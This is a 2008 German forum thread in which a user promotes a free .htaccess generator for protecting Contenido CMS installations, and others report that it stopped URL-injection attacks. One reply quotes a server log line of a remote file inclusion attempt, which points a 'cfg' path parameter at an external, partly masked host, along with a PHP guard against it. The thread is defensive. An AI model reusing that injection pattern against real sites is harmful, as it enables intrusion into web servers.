CONTENIDO Forum

Das Diskussionsforum zum Open Source Content Management System
https://forum.contenido.org/

.htaccess Dateien Generator zum Schutz für Contenido

https://forum.contenido.org/viewtopic.php?f=98&t=21351

Seite 1 von 1

.htaccess Dateien Generator zum Schutz für Contenido

Verfasst: Di 6. Mai 2008, 20:17
von boeckers
In der Vergangenheit kam es häufig vor, dass durch ein direktes Aufrufen von PHP-Dateien ungewünschte Aktivitäten seitens der Webanwendung ausgeführt wurden, z.B. durch URL-Injection.

conubo-HTA.lite (in der Version für Contenido) versucht dies durch das automatische Anlegen von so genannten .htaccess Dateien, die den Zugriff auf bestimmte Verzeichnisse und Dateien steuern, zu verhindern.

Weitere Informationen und den kostenlosen download findet Ihr auf www.conubo.net unter dem Menüpunkt "HTA"

Wenn Ihr noch Ideen oder Vorschläge habt um diesen Schutz noch zu erweitern, dann sendet mir doch bitte einfach eine Mail.

Emailadresse findet Ihr auf der conubo-Website.

Gruss

boeckers

Verfasst: Mi 7. Mai 2008, 08:49
von iwantrock
Hallo zusammen,

ich habe am Montag den conuboHTA auf einer Contenido Installation eines Kunden, der noch Contenido 4.6.2 hat, installiert. Diese Installation soll auf Wunsch des Kunden nicht upgedatet werden.
Die Website hatte jedoch starke Probleme mit URL Injection.2 Hier insbesondere betroffen die Datei include.rights_subnav.php im contenido/includes Verz. Die Datei hatte zwar schon ein Fix (siehe Code), jedoch hielt es die Hacker nicht von der URL Injection per POST cfg ab.

Code: Alles auswählen

if ($_GET["cfg"] || $_POST["cfg"]) 
{ 
   die(); 
} 
if ($_REQUEST["cfg"] ) 
{ 
   die(); 
}
[29/Apr/2008:22:39:24 +0200] "POST //contenido/includes/include.rights_subnav.php?cfg[path][contenido]=http://www.geocities.com/****? HTTP/1.1" 200 5

Jetzt, nach der Installation des conuboHTA wurden zwar noch - laut Serverlogs - Versuche einer URL Injection unternommen, doch Dank conuboHTA wurden diese erfolgreich verhindert.

Die Installation ist einfach und selbstklärend und lässt sich innerhalb von wenigen Minuten ausführen. Für ein sichereres Contenido - alleine schon auf Grund des hta Passwords auf dem Contenido Verz - auf jeden Fall eine Empfehlung Wert. Besonders eben bei älteren Contenido Installationen.

Verfasst: Fr 9. Mai 2008, 20:44
von Freddy
Hab es gerade das HTA auf meiner 4.6.23mr Version ausprobiert. Es funktioniert einwandtfrei. Superguter Generator. Vielen Dank für deine Mühe Uwe.

Verfasst: Do 22. Mai 2008, 10:16
von Hammy
Na, das hört sich doch interessant an. Werde ich auch gleich mal ausprobieren, auch auf 4.6.23MR.

Ich mache mir auch immer mehr Gedanken, wie anfällig Contenido ist und hoffe, dass damit, auch gerade bei älteren Projekte, die nicht immer gleich gepatched werden, die Sicherheit erhöht wird.
Alle Zeiten sind UTC+01:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de